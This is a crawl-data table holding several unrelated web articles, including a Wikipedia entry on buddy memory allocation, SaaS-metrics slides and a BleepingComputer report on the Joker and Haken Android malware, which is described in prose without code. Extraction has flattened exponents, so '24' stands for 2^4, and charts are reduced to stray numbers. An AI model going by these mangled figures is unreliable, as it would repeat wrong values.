id
int64 3
41.8M
| url
stringlengths 1
1.84k
| title
stringlengths 1
9.99k
⌀ | author
stringlengths 1
10k
⌀ | markdown
stringlengths 1
4.36M
⌀ | downloaded
bool 2
classes | meta_extracted
bool 2
classes | parsed
bool 2
classes | description
stringlengths 1
10k
⌀ | filedate
stringclasses 2
values | date
stringlengths 9
19
⌀ | image
stringlengths 1
10k
⌀ | pagetype
stringclasses 365
values | hostname
stringlengths 4
84
⌀ | sitename
stringlengths 1
1.6k
⌀ | tags
stringclasses 0
values | categories
stringclasses 0
values |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1,000,288 | http://singularityhub.com/2009/12/16/gina-makes-genetic-discrimination-illegal-in-us/ | GINA Makes Genetic Discrimination Illegal In US | Steven Wasick | Craig Venter was the first person to ever publish his genome, and while he may have had some worries before exposing his DNA to the world, getting fired was not one of them. Now, the rest of us can relax as well. The Genetic Information Non-Discrimination Act (GINA) has recently been implemented to prevent employers from discriminating based on genetic information. This reform goes a long way towards eliminating this new form of prejudice, but there are gaps and ambiguities in what it protects, and questions about how it will hold up in the future.
First, the basics: GINA passed almost unanimously out of congress and was signed by President Bush in May of 2008. Regulations preventing health insurance discrimination have been phasing in since May of this year. The law applies to all health policies, except those for long term care, and also exempts life insurance, despite the fact that genetic discrimination for life insurance has been banned in both the U.K. and Australia.
Employers also have exemptions. The law does not apply to businesses that employ fewer than 15 employees, and employers can still obtain information on family history that they can glean from obituaries, publicly stated information (the “water cooler” exemption), and leave taken under the Family Medical Leave Act.
Eliminating the fear that genetic information will be used to bar health coverage and employment is good news for commercial testing companies like 23andMe, and for researchers trying to recruit subjects for genetic testing. But while GINA will help to treat people of various genotypes fairly, the effects are more complicated. An employer may already know about your family’s history of early heart disease, but now they cannot act on it. No doubt there are also plenty of lawyers giddy about filing lawsuits that turn on where the boundaries of genetic information are. If your father was an alcoholic, is that genetic information, or just behavioral? Somebody is going to pay a lot of legal fees to find out.
As genetic information becomes more widespread, situations where an employer knows information, perhaps even important information, about their employee, and just has to pretend that they don’t, will become more commonplace. Also potentially problematic, is how this will affect employers making hiring decisions, not on the basis of saving money on health insurance, but for determining the capabilities of their employee. Should the Secret Service really have to look the other way when hiring someone with a genetic predisposition to schizophrenia? Or how about when the bar to employment is partially for the employee’s benefit, such as a mining company that would not want to hire people predisposed to lung problems? These conflicts will only increase in a world with $100 genome tests and DNA Facebook apps.
Going even further forward, it will be interesting to see if this law holds up as genetic modification becomes more commonplace. After all, once negative aspects of your genome become a choice, will people still want to carry around the dead weight (mind the pun) of non-genetically modified people on their insurance policy? I would certainly rather have the option of joining a cheaper insurance plan that includes others who are willing to undergo testing and modification. Although a similar situation could occur today, with people joining in a plan with others who have particular healthy genomes, from a fairness standpoint, it’s just not the same. Once people can change their genome, it would no longer be discrimination based on an accident of nature, but on a personal choice.
This idea can lead to a “slippery slope” argument questioning where discrimination based on modified versus unmodified genomes would end, and in a way, the fight to protect genetic information is the harbinger of other, more serious battles. All of them relate to seeing others, and ourselves, as bundles of information, along with being human. The fights now, and in the future over GINA will be signposts for how we deal with the conflict between those two views of ourselves.
For more information about GINA, you can read this fact sheet from the National Institutes of Health.
*[image credits: Wiki Commons, NIH]* | true | true | true | Craig Venter was the first person to ever publish his genome, and while he may have had some worries before exposing his DNA to the world, getting fired was not one of them. Now, the rest of us can relax as well. The Genetic Information Non-Discrimination Act (GINA) has recently been implemented to prevent employers […] | 2024-10-12 00:00:00 | 2009-12-16 00:00:00 | article | singularityhub.com | Singularity Hub | null | null |
|
35,228,687 | https://aisstream.io/ | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
16,628,196 | https://cloudplatform.googleblog.com/2018/03/Kubernetes-Engine-network-policy-is-now-generally-available.html | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
6,492,350 | http://www.bbc.co.uk/news/business-24392336 | Twitter wants to raise $1bn in its stock market debut | null | # Twitter wants to raise $1bn in its stock market debut
- Published
**Social networking company Twitter has said it plans to raise $1bn (£619m) in its stock market debut **in documents, external** filed with US regulators. **
In the filing, revealed on Thursday, the seven-year-old company said that it now has 218 million monthly users and that 500 million tweets are sent a day.
It made a loss of $69m in the first six months of 2013, on revenues of $254m.
It will be the largest Silicon Valley stock offering since Facebook's listing in 2012.
Analysts said that the offering was likely to get a good response.
"Social media is red hot," said Internet analyst Lou Kerner. "Twitter is front and centre benefiting from market enthusiasm for all things social, and remarkably strong metrics."
## Financial details
The filing also revealed Twitter's finances for the first time.
While the company has never made a profit, its revenue has grown from just $28m in 2010 to $317m by the end of 2012.
Around 85% of Twitter's revenue last year came from ad sales; the rest was from licensing its data.
The company takes in a significant portion of its ad revenue from mobile devices, an important metric often tracked by analysts.
As of 2013, over 65% of the company's advertising revenue was generated from mobile devices. More than 75% of Twitter users accessed the site from their mobile phone during that same time period.
Some analysts said that the decision by the firm to raise capital indicated that it was keen on improving the way people enjoy content on its platform and how advertisers connect with its users.
"Users should be happy about this," said Zachary Reiss-Davis, an analyst with Forrester.
"It looks like Twitter is looking at how to enrich the experience and it understands that to build a successful service, they have to create something people like and want to come back to and spend time on."
Peter Esho from Sydney-based Invast Financial Services, added that Twitter's ease to use had seen it increase its user base, making it an attractive option for advertisers.
"I think what Twitter has working in its favour is that it's very easy to use: it doesn't eat up too much bandwidth for the average user in places where broadband penetration is low," he said.
The filing also revealed that two of the company's co-founders, Evan Williams and Jack Dorsey, own significant stakes in Twitter, and could stand to take in significant sums from the company's stock market listing.
Mr Williams owns 12% of shares in the company, while Mr Dorsey owns 4.9%.
Benchmark Capital's Peter Fenton, an early investor in the company, is the second-biggest shareholder, with 6.7% of shares.
## Advantage Nasdaq?
Twitter indicated three weeks earlier that it had filed for a public stock market offering.
However, under a new law passed by Congress in 2012, it did not have to reveal its financial documents because it had revenue of less than $1bn.
But by releasing the documents publicly, it gave an indication that it hopes to complete its stock sale soon.
The company plans to list under the stock symbol TWTR, but it did not reveal which stock exchange, the Nasdaq or New York Stock Exchange, it had chosen.
However, Mr Esho said that the listing was likely to be on the Nasdaq.
"I was to speculate, I think it would have to be Nasdaq," he said. "That really is the exchange that has seen so many tech names come to the market."
Goldman Sachs is the lead bank taking the company public, a coveted position that is often fought for amongst the nation's biggest banks.
The other banks helping with the offering are Morgan Stanley, JP Morgan, BofA Merrill Lynch, Deutsche Bank Securities and CODE Advisors.
- Published7 November 2013
- Published4 October 2013
- Published4 October 2013
- Published2 October 2013
- Published1 October 2013
- Published13 September 2013 | true | true | true | In documents made public for the first time, social networking company Twitter has said it plans to raise $1bn as part of its stock market debut. | 2024-10-12 00:00:00 | 2013-10-03 00:00:00 | article | bbc.com | BBC News | null | null |
|
23,965,289 | https://www.youtube.com/watch?v=nLSm3Haxz0I | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
23,795,458 | https://en.wikipedia.org/wiki/Buddy_memory_allocation | Buddy memory allocation - Wikipedia | null | # Buddy memory allocation
The **buddy memory allocation** technique is a memory allocation algorithm that divides memory into partitions to try to satisfy a memory request as suitably as possible. This system makes use of splitting memory into halves to try to give a best fit. According to Donald Knuth, the buddy system was invented in 1963 by Harry Markowitz, and was first described by Kenneth C. Knowlton (published 1965).[1] The Buddy memory allocation is relatively easy to implement. It supports limited but efficient splitting and coalescing of memory blocks.
## Algorithm
[edit]There are various forms of the buddy system; those in which each block is subdivided into two smaller blocks are the simplest and most common variety. Every memory block in this system has an *order*, where the order is an integer ranging from 0 to a specified upper limit. The size of a block of order n is proportional to 2n, so that the blocks are exactly twice the size of blocks that are one order lower. Power-of-two block sizes make address computation simple, because all buddies are aligned on memory address boundaries that are powers of two. When a larger block is split, it is divided into two smaller blocks, and each smaller block becomes a unique buddy to the other. A split block can only be merged with its unique buddy block, which then reforms the larger block they were split from.
Starting off, the size of the smallest possible block is determined, i.e. the smallest memory block that can be allocated. If no lower limit existed at all (e.g., bit-sized allocations were possible), there would be a lot of memory and computational overhead for the system to keep track of which parts of the memory are allocated and unallocated. However, a rather low limit may be desirable, so that the average memory waste per allocation (concerning allocations that are, in size, not multiples of the smallest block) is minimized. Typically the lower limit would be small enough to minimize the average wasted space per allocation, but large enough to avoid excessive overhead. The smallest block size is then taken as the size of an order-0 block, so that all higher orders are expressed as power-of-two multiples of this size.
The programmer then has to decide on, or to write code to obtain, the highest possible order that can fit in the remaining available memory space. Since the total available memory in a given computer system may not be a power-of-two multiple of the minimum block size, the largest block size may not span the entire memory of the system. For instance, if the system had 2000 K of physical memory and the order-0 block size was 4 K, the upper limit on the order would be 8, since an order-8 block (256 order-0 blocks, 1024 K) is the biggest block that will fit in memory. Consequently, it is impossible to allocate the entire physical memory in a single chunk; the remaining 976 K of memory would have to be allocated in smaller blocks.
### Example
[edit]The following is an example of what happens when a program makes requests for memory. Assume that in this system, the smallest possible block is 64 kilobytes in size, and the upper limit for the order is 4, which results in a largest possible allocatable block, 24 times 64 K = 1024 K in size. The following shows a possible state of the system after various memory requests.
Step | 64 K | 64 K | 64 K | 64 K | 64 K | 64 K | 64 K | 64 K | 64 K | 64 K | 64 K | 64 K | 64 K | 64 K | 64 K | 64 K |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1 | 24
| |||||||||||||||
2.1 | 23
|
23
| ||||||||||||||
2.2 | 22
|
22
|
23
| |||||||||||||
2.3 | 21
|
21
|
22
|
23
| ||||||||||||
2.4 | 20
|
20
|
21
|
22
|
23
| |||||||||||
2.5 | A: 20
|
20
|
21
|
22
|
23
| |||||||||||
3 | A: 20
|
20
|
B: 21
|
22
|
23
| |||||||||||
4 | A: 20
|
C: 20
|
B: 21
|
22
|
23
| |||||||||||
5.1 | A: 20
|
C: 20
|
B: 21
|
21
|
21
|
23
| ||||||||||
5.2 | A: 20
|
C: 20
|
B: 21
|
D: 21
|
21
|
23
| ||||||||||
6 | A: 20
|
C: 20
|
21
|
D: 21
|
21
|
23
| ||||||||||
7.1 | A: 20
|
C: 20
|
21
|
21
|
21
|
23
| ||||||||||
7.2 | A: 20
|
C: 20
|
21
|
22
|
23
| |||||||||||
8 | 20
|
C: 20
|
21
|
22
|
23
| |||||||||||
9.1 | 20
|
20
|
21
|
22
|
23
| |||||||||||
9.2 | 21
|
21
|
22
|
23
| ||||||||||||
9.3 | 22
|
22
|
23
| |||||||||||||
9.4 | 23
|
23
| ||||||||||||||
9.5 | 24
|
This allocation could have occurred in the following manner
- The initial situation.
- Program A requests memory 34 K, order 0.
- No order 0 blocks are available, so an order 4 block is split, creating two order 3 blocks.
- Still no order 0 blocks available, so the first order 3 block is split, creating two order 2 blocks.
- Still no order 0 blocks available, so the first order 2 block is split, creating two order 1 blocks.
- Still no order 0 blocks available, so the first order 1 block is split, creating two order 0 blocks.
- Now an order 0 block is available, so it is allocated to A.
- Program B requests memory 66 K, order 1. An order 1 block is available, so it is allocated to B.
- Program C requests memory 35 K, order 0. An order 0 block is available, so it is allocated to C.
- Program D requests memory 67 K, order 1.
- No order 1 blocks are available, so an order 2 block is split, creating two order 1 blocks.
- Now an order 1 block is available, so it is allocated to D.
- Program B releases its memory, freeing one order 1 block.
- Program D releases its memory.
- One order 1 block is freed.
- Since the buddy block of the newly freed block is also free, the two are merged into one order 2 block.
- Program A releases its memory, freeing one order 0 block.
- Program C releases its memory.
- One order 0 block is freed.
- Since the buddy block of the newly freed block is also free, the two are merged into one order 1 block.
- Since the buddy block of the newly formed order 1 block is also free, the two are merged into one order 2 block.
- Since the buddy block of the newly formed order 2 block is also free, the two are merged into one order 3 block.
- Since the buddy block of the newly formed order 3 block is also free, the two are merged into one order 4 block.
As you can see, what happens when a memory request is made is as follows:
- If memory is to be allocated
- Look for a memory slot of a suitable size (the minimal 2
kblock that is larger or equal to that of the requested memory)- If it is found, it is allocated to the program
- If not, it tries to make a suitable memory slot. The system does so by trying the following:
- Split a free memory slot larger than the requested memory size into half
- If the lower limit is reached, then allocate that amount of memory
- Go back to step 1 (look for a memory slot of a suitable size)
- Repeat this process until a suitable memory slot is found
- If memory is to be freed
- Free the block of memory
- Look at the neighboring block – is it free too?
- If it is, combine the two, and go back to step 2 and repeat this process until either the upper limit is reached (all memory is freed), or until a non-free neighbour block is encountered
## Implementation and efficiency
[edit]In comparison to other simpler techniques such as dynamic allocation, the buddy memory system has little external fragmentation, and allows for compaction of memory with little overhead. The buddy method of freeing memory is fast, with the maximal number of compactions required equal to O(highest order) = O(log2(total memory size)). Typically the buddy memory allocation system is implemented with the use of a binary tree to represent used or unused split memory blocks. The address of a block's "buddy" is equal to the bitwise exclusive OR (XOR) of the block's address and the block's size.
However, there still exists the problem of internal fragmentation – memory wasted because the memory requested is a little larger than a small block, but a lot smaller than a large block. Because of the way the buddy memory allocation technique works, a program that requests 66 K of memory would be allocated 128 K, which results in a waste of 62 K of memory. This problem can be solved by slab allocation, which may be layered on top of the more coarse buddy allocator to provide more fine-grained allocation.
One version of the buddy allocation algorithm was described in detail by Donald Knuth in volume 1 of *The Art of Computer Programming*.[2] The Linux kernel also uses the buddy system, with further modifications to minimise external fragmentation, along with various other allocators to manage the memory within blocks.[3]
`jemalloc`
[4] is a modern memory allocator that employs, among others, the buddy technique.
## See also
[edit]## References
[edit]**^**Kenneth C. Knowlton. A Fast storage allocator. Communications of the ACM 8(10):623–625, Oct 1965.*also*Kenneth C Knowlton. A programmer's description of L6. Communications of the ACM, 9(8):616–625, Aug. 1966 [see also : Google books [1] page 85]**^**Knuth, Donald (1997).*Fundamental Algorithms*. The Art of Computer Programming. Vol. 1 (Second ed.). Reading, Massachusetts: Addison-Wesley. pp. 435–455. ISBN 0-201-89683-4.**^**Mauerer, Wolfgang (October 2008).*Professional Linux Kernel Architecture*. Wrox Press. ISBN 978-0-470-34343-2.**^**Evans, Jason (16 April 2006),*A Scalable Concurrent*(PDF), pp. 4–5`malloc(3)`
Implementation for FreeBSD | true | true | true | null | 2024-10-12 00:00:00 | 2003-11-12 00:00:00 | null | website | wikipedia.org | Wikimedia Foundation, Inc. | null | null |
20,635,699 | https://www.techrepublic.com/article/are-developers-honestly-happy-working-60-hour-weeks-why-its-bad-news-whatever-your-programming-language/ | Developer | TechRepublic | null | #### Developer
Apple### Apple Unlocks Contactless Payment for App Developers
Developers could create payment apps as alternatives to Apple Pay, or digital ID cards.
Developers could create payment apps as alternatives to Apple Pay, or digital ID cards.
Today’s best web design courses will cover the principles of UX, HTML, CSS, and more.
Web development can be a lucrative and challenging career. See our top picks for courses that can introduce you to the field and kick-start your job search.
The benefits of using Java alternatives such as Azul might include cost optimisation, higher performance and vulnerability management.
C++ and Python continue to compete for the top spot, while Delphi/Object Pascal reaches the top ten.
After just one year, Mojo may be in for a rapid rise after its entrance into the TIOBE Index top 50 list of most popular programming languages.
C++ and Python continue to compete for the top spot, while Delphi/Object Pascal reaches the top ten.
Master web development, data science, and GUI programming with 11 real-world Python courses totaling 61 hours of content for just $39.99.
With 207 hours of comprehensive training, learn to build complex, responsive, and scalable mobile apps that meet the demands of today’s mobile-first world.
Gain essential data science skills at your own pace, from mastering Python fundamentals to exploring machine learning—all from the comfort of your home.
For just $40, unlock 10 courses packed with 53 hours of practical, beginner-friendly coding skills in HTML, CSS, JavaScript, MongoDB, Redux, and more.
This comprehensive guide offers details about Microsoft Windows 11, including new features, system requirements and more.
Whether you're coding your first app or leveling up your skills, this C# bundle has you covered with 60 hours of learning for $39.99.
Master HTML, CSS, JavaScript, and more with 14 in-depth courses and 109 hours of hands-on training—build websites like the pros for just $39.99.
TechRepublic Premium content helps you solve your toughest IT issues and jump-start your career or next project.
Red Hat's decision to end CentOS is forcing most developers and companies to find an alternative OS. In this guide, learn about the top competitors' features.
Automating basic tasks for your business could be as simple as studying Microsoft PowerShell in these concise courses that you get access to for life.
Using this bundle's six courses totaling 44 hours, you can equip yourself with the skills used by major companies in industries like finance and tech.
Gain essential skills in Python, machine learning, and AI with flexible, self-paced courses designed to fit into your schedule—learn from anywhere.
Today’s best software testing courses offer hands-on experience with unit testing, static analysis, automating functional tests and more. | true | true | true | null | 2024-10-12 00:00:00 | 2024-08-15 00:00:00 | null | article | techrepublic.com | TechRepublic | null | null |
40,084,964 | https://digitalpreservation-blog.lib.cam.ac.uk/raw-flux-streams-and-obscure-formats-further-work-around-imaging-5-25-inch-floppy-disks-5a2cf2e5f0d1 | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
19,472,236 | https://www.slideshare.net/DavidSkok/the-saas-business-model-and-metrics | The SaaS business model and metrics | David Skok Follow | A detailed look at why SaaS business are so different from traditional software companies, and why traditional ways of looking at their finances fail to understand the business. Provides an alternative set of metrics that show the right way to look at a SaaS business.
For more on the SaaS business model and Metrics, see this blog post:
www.forentrepreneurs.com/saas-metrics-2/
13. “The thing that surprises many investors &
boards of directors about the SaaS model is
that, even with perfect execution, an
acceleration of growth will often be
accompanied by a squeeze on profitability and
cash flow.”
Ron Gill, CFO at Netsuite
14. What’s the impact of faster growth?
$(10,000,000)
$(5,000,000)
$-
$5,000,000
$10,000,000
$15,000,000
$20,000,000
$25,000,000
2 more
Customers/Month
5 more
Customers/Month
10 more
Customers/Month
15. What’s the impact of faster growth?
$(10,000,000)
$(5,000,000)
$-
$5,000,000
$10,000,000
$15,000,000
$20,000,000
$25,000,000
2 more
Customers/Month
5 more
Customers/Month
10 more
Customers/Month
Cash Flow Trough
gets deeper
16. “As soon as the product starts to see some
significant uptake, investors expect that the
losses / cash drain should narrow, right?
Instead, this is the perfect time to increase
investment in the business, which will
cause losses to deepen again.”
Ron Gill, CFO at Netsuite
37. Revenue from one group of customers
(cohort) with no upsell/cross-sell
Time
$’s
Upsell revenue
from the same cohort
Negative
Churn
Revenue from a single cohort
38. CRR and DRR
CRR: Customer Retention Rate
DRR: Dollar Retention Rate
Annual Numbers – expressed as a percentage
Look at the year ago cohort
40. Revenue Lost with 2.5% monthly Churn
Renewals
Lost due
to Churn
YEAR 3
$3m $7m
Becomes harder
& harder to
replace this with
new bookings
Renewals
Lost due
to Churn
YEAR 6
$30m $70m
44. Customer Success
• Not just the responsibility of Customer Success department
• Product
• Design
• Quality (response time, bugs and downtime)
• Sales
• Don’t over sell the product
• Don’t sell the product to the wrong customer types
• Marketing
• Marketing to customers, not just prospects
• But good to have single executive who has this as their top
priority
47. CHI – Customer Happiness Index
• Find a way to predict the likelihood of churn
• Most common and simple technique: Usage
• More sophisticated:
• Score usage of specific features higher than others
• E.g.
• Commenting on someone else’s posts on Facebook = Low
• Creating your own post = High
48. High Usage does not correlate with High Value
Usage
Business Value
Optimal
Worst
49. My Suggestion
• Consider a CHI score based on Business Value achieved,
and find a way to measure automatically in the app
• Example:
• How many new leads did you bring the customer?
• How much did you improve the lead to customer conversion rate?
57. Always ask to see Bookings over Time
Entrepreneurs always happy to show their MRR over time
But this doesn’t tell whether their bookings are growing
$(15.0)
$(10.0)
$(5.0)
$-
$5.0
$10.0
$15.0
$20.0
$25.0
$30.0
$35.0
Jan Feb Mar Apr May Jun
MRR Bookings
New MRR
Net New MRR
Expansion MRR
Churned MRR
59. How Revenue Builds for a SaaS Salesperson
(assumingnorampuptime)
$0
$5,000
$10,000
$15,000
$20,000
$25,000
$30,000
$35,000
$40,000
$45,000
Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec
With Churn of 2.5%
Jan Custs Feb Custs Mar Custs Apr Custs
May Custs Jun Custs Jul Custs Aug Custs
Sep Custs Oct Custs Nov Custs Dec Custs
$0
$5,000
$10,000
$15,000
$20,000
$25,000
$30,000
$35,000
$40,000
$45,000
Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec
With no Churn
Jan Custs Feb Custs Mar Custs Apr Custs
May Custs Jun Custs Jul Custs Aug Custs
Sep Custs Oct Custs Nov Custs Dec Custs
60. The Cash Flow Gap
$(25,000)
$(20,000)
$(15,000)
$(10,000)
$(5,000)
$-
$5,000
$10,000
$15,000
$20,000
$25,000
Month1
Month2
Month3
Month4
Month5
Month6
Month7
Month8
Month9
Month10
Month11
Month12
Month13
Month14
Month15
Month16
Month17
Month18
Month19
Month20
Month21
Month22
Month23
Month24
Net profit - New Sales Hire
$-
$5,000
$10,000
$15,000
$20,000
$25,000
$30,000
Month
1
Month
2
Month
3
Month
4
Month
5
Month
6
Month
7
Month
8
Month
9
Month
10
Month
11
Month
12
MRR vs Expenses – New Sales
Hire
MRR
Expenses
Cash
Gap
(Slightly later breakeven point, because Gross Profit is less than MRR)
11 months to
breakeven
61. The SaaS Cash Flow Trough
$(200,000)
$(100,000)
$-
$100,000
$200,000
$300,000
$400,000
Cumulative Net Profit - New Sales Hire
23 Months to
get back the
investment
Total amount
invested:
$110k
But a great
return on
investment
62. Search for Product/Market Fit
Scaling the Business
Search for Repeatable & Scalable
Sales Model
Conserve Cash Invest Aggressively
63. What happens at the company level when
we add 2 new sales hires every month?
$(250,000)
$(200,000)
$(150,000)
$(100,000)
$(50,000)
$-
$50,000
$100,000
$150,000
Month1
Month2
Month3
Month4
Month5
Month6
Month7
Month8
Month9
Month10
Month11
Month12
Month13
Month14
Month15
Month16
Month17
Month18
Month19
Month20
Month21
Month22
Month23
Month24
Net profit
$(3,000,000)
$(2,000,000)
$(1,000,000)
$-
$1,000,000
$2,000,000
$3,000,000
$4,000,000
Cumulative Net Profit
32 Months to
get back the
investment
Total amount
invested:
$2.6m
First profitable
month: 21
Worst loss:
$190k in
month 11
64. Comparison: hiring one versus two sales
people per month
$(400,000)
$(200,000)
$-
$200,000
$400,000
$600,000
$800,000
Month1
Month3
Month5
Month7
Month9
Month11
Month13
Month15
Month17
Month19
Month21
Month23
Month25
Month27
Month29
Month31
Month33
Month35
Net Profit
1 sales hire a month 2 sales hires a month
$(3,000,000)
$(2,000,000)
$(1,000,000)
$-
$1,000,000
$2,000,000
$3,000,000
$4,000,000
Month1
Month3
Month5
Month7
Month9
Month11
Month13
Month15
Month17
Month19
Month21
Month23
Month25
Month27
Month29
Month31
Month33
Month35
Cumulative Net Profit
1 sales hire a month 2 sales hires a month
The time to
breakeven remains
the same
The cash flow
trough is halved
Not adequately shown, but
the acceleration after
breakeven is also halved
67. What happens if we collect a year’s
payment in advance?
$(5,000,000)
$-
$5,000,000
$10,000,000
$15,000,000
$20,000,000
$25,000,000
$30,000,000
$35,000,000
$40,000,000
Month1
Month3
Month5
Month7
Month9
Month11
Month13
Month15
Month17
Month19
Month21
Month23
Month25
Month27
Month29
Month31
Month33
Month35
Cumulative Cashflow
comparision - monthly
payments vs year in
advance
Cumulative Net Profit
Cumulative Net Cash Flows
$(500,000)
$-
$500,000
$1,000,000
$1,500,000
$2,000,000
$2,500,000
Cashflow comparison -
monthly payments vs
year in advance
Net profit Net Cash Flows
Eliminates the
cash flow trough,
and means $35m
more cash in this
scenario
71. A rough estimate of CAC versus
Sales Complexity
Freemium
No Touch
Self-
Service
Light Touch
Inside
Sales
High Touch
Inside
Sales
Field Sales
Field Sales
with SE’s
$0-
$40
$30 –
$200
$300 -
$800
$3,000 -
$8,000
$25,000 –
$75,000
$75,000 –
$200,000
Rough Estimates of Cost of Customer Acquisition (CAC)
72. The relationship is roughly exponential
Clearly adding
Human Touch
dramatically
increases costs
77. To make it comparable with a traditional software business,
eliminate New Customer Sales, as those benefit the future
Revenue
100%
CoGS
24%
Sales &
Marketing
51%
R&D
15%
G&A
13%
Profit
20%
Expansion
&
Retention
25%
New
Customer
Sales
26%
CoGS
24%
R&D
15%
G&A
13%
Loss (6%)
Expansion
&
Retention
25%
78. Profit
20%
Expansion
&
Retention
25%
CoGS
24%
R&D
15%
G&A
13%
Now look at DRR (Dollar Retention Rate):
• Example DRR = 123% (Zendesk’s number)
• The existing customer base with no additional revenue
is growing at 23% annually
• So you have a business growing 23% year-on-year,
generating 20% Profit
80. Summary
• Expect to see the P&L / Cash Flow trough
• Use Unit Economics to evaluate the business
• Look for negative churn, (where DRR > 100%)
• Use SaaS metrics, not traditional metrics
81. The 3 Keys to SaaS Success
1 Acquisition
2 Retention
3 Monetization
82. • Visit my blog at www.forEntrepreneurs.com
For more information…
84. The Magic Number
• In general, I don’t like the Magic Number
• Hard to explain and understand
• BUT – a public company may not give:
• LTV:CAC ratio
• Months to recover CAC
• So use Magic Number to calculate something roughly equivalent
• First developed by the Josh James, CEO of Omniture
• The key insight - if your Magic Number is:
• Above 0.75 – step on the gas
• Below 0.75 – step back and look at your business
• Below 0.5 – business probably not ready to expand
85. The Formula for Magic Number
• QRR[X] = Quarterly Revenue in the current quarter
• QRR[X-1] = Quarterly Revenue in the prior quarter
• Sales & Marketing Expense [X-1] = Sales & Marketing expense in the prior quarter
𝑀𝑎𝑔𝑖𝑐 𝑁𝑢𝑚𝑏𝑒𝑟 =
(𝑄𝑅𝑒𝑣 𝑋 − 𝑄𝑅𝑒𝑣 𝑋 − 1 ) ∗ 4
𝑆𝑎𝑙𝑒𝑠 & 𝑀𝑎𝑟𝑘𝑒𝑡𝑖𝑛𝑔 𝐸𝑥𝑝𝑒𝑛𝑠𝑒 [𝑋 − 1]
𝑀𝑎𝑔𝑖𝑐 𝑁𝑢𝑚𝑏𝑒𝑟 =
𝐼𝑛𝑐𝑟𝑒𝑎𝑠𝑒 𝑖𝑛 𝑄𝑢𝑎𝑟𝑡𝑒𝑟𝑙𝑦 𝑅𝑒𝑐𝑢𝑟𝑟𝑖𝑛𝑔 𝑅𝑒𝑣𝑒𝑛𝑢𝑒 ∗ 4
𝑃𝑟𝑖𝑜𝑟 𝑄𝑢𝑎𝑟𝑡𝑒𝑟′ 𝑠 𝑆𝑎𝑙𝑒𝑠 & 𝑀𝑎𝑟𝑘𝑒𝑡𝑖𝑛𝑔 𝐸𝑥𝑝𝑒𝑛𝑠𝑒𝑠
Expressed in a slightly more readable form:
86. Example Magic Number calculation
Q1 Q2 Q3
Revenue $1,000,000 $1,200,000 $1,500,000
Sales & Marketing Expense $800,000 $900,000
Magic Number 1.0 1.33 | true | true | true | The SaaS business model and metrics - Download as a PDF or view online for free | 2024-10-12 00:00:00 | 2015-05-08 00:00:00 | website | slideshare.net | Slideshare | null | null |
|
3,379,321 | http://dailyjs.com/2011/12/21/node-roundup/ | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
22,393,045 | https://www.bleepingcomputer.com/news/security/android-malware-joker-still-fools-googles-defense-new-clicker-found/ | Android Malware: Joker Still Fools Google's Defense, New Clicker Found | Ionut Ilascu | Joker malware that subscribes Android users to premium services without consent is giving Google a hard time as new samples constantly bypass scrutiny and end up in Play Store.
The malware is under constant development and new samples found in the official Android repository seem to be created specifically to avoid Google's detection mechanisms.
Also known as Bread, the malware is a spyware and premium dialer that can access notifications, read and send SMS texts. These capabilities are used to invisibly subscribe victims to premium services.
## Joker avoids US and Canada
Researchers at Check Point discovered four new samples in Play Store recently, in apps with a cumulative installation count higher than 130,000. The malware was hidden in camera, wallpaper, SMS, and photo editing software:
- com.app.reyflow.phote
- com.race.mely.wpaper
- com.landscape.camera.plus
- com.vailsmsplus
To conceal malicious functionality in infected apps, a simple XOR encryption with a static key is applied to relevant strings that check for the presence of an initial payload; if non-existent, it is downloaded from a command and control (C2) server.
The malware does not target devices from the U.S. and Canada, as Check Point discovered a function that reads the operator information specifically to filter out these regions.
If conditions are met, Joker contacts its C2 server to load a configuration file containing a URL for another payload that is executed immediately after download.
"With access to the notification listener, and the ability to send SMS, the payload listens for incoming SMS and extract the premium service confirmation code (2FA) and sends it to the “Offer Page”, to subscribe the user to that premium service" - Check Point
The subscription process is invisible to the user as the URLs for the premium services, which are present in the configuration file, are opened in a hidden webview.
Joker's developer frequently adapts the code to remain undetected. Google says that many of the samples observed in the wild appear to be specifically created for distribution via Play Store as they were not seen elsewhere.
Since Google started tracking Joker in early 2017, the company removed about 1,700 infected Play Store apps. This did not deter the malware author, though, who "used just about every cloaking and obfuscation technique under the sun in an attempt to go undetected."
"At different times, we have seen three or more active variants using different approaches or targeting different carriers. [..] At peak times of activity, we have seen up to 23 different apps from this family submitted to Play in one day" - Google
New Joker samples emerge almost every day in Google's Play Store, says Aviran Hazum, mobile security researcher at Check Point.
Tatyana Shishkova, Android malware analyst at Kaspersky, has been tweeting about apps with Joker code since October, 2019. She listed over 70 compromised apps that made it into Play Store, many having at least 5,000 installations and a few with more than 50,000.
Almost all of them have been removed from the repository. At least, three totaling more than 21,000 installations, are still present, as Shishkova shows with a tweet today:
#Joker Trojans on Google Playhttps://t.co/q2iWCcNd9v Feb 18, 10,000+ installshttps://t.co/TJcfsmz5FP Feb 19, 1,000+ installshttps://t.co/EagH4xZymj Feb 20, 10,000+ installs pic.twitter.com/lDfDcbhKFk
— Tatyana Shishkova (@sh1shk0va) February 21, 2020
The three apps are Sweet Cam, Photo Collage Editor, and Snap Message. They are listed under different developer names and very few reviews averaging a score of three stars.
## New clicker in Play Store
The same Check Point researchers, Ohad Mana, Israel Wernik, and Bogdan Melnykov led by Aviran Hazum, discovered a new clicker malware family in eight apps on Play Store that seemed to be benign. Collectively, they have more than 50,000 installations.
The purpose of a clicker is ad fraud by mimicking user clicks on advertisements. Mobile ad fraud is a constant challenge these days as it can take many forms. For this offense Google announced yesterday that it removed nearly 600 apps from the official Android store and also banned them from its ad monetization platforms, Google AdMob and Google Ad Manager.
Named Haken, the new clicker malware relies on native code and injection into Facebook and AdMob libraries and gets the configuration from a remote server after it gets past Google's verification process.
The malware was present in applications that provide the advertised functionality, such as a compass app. One flag indicating malicious intent is asking for permissions that the compromised app does not need, such as running code when the device boots.
Once it gets the necessary permissions, Haken achieves its goal by loading a native library ('kagu-lib') and registering two workers and a timer.
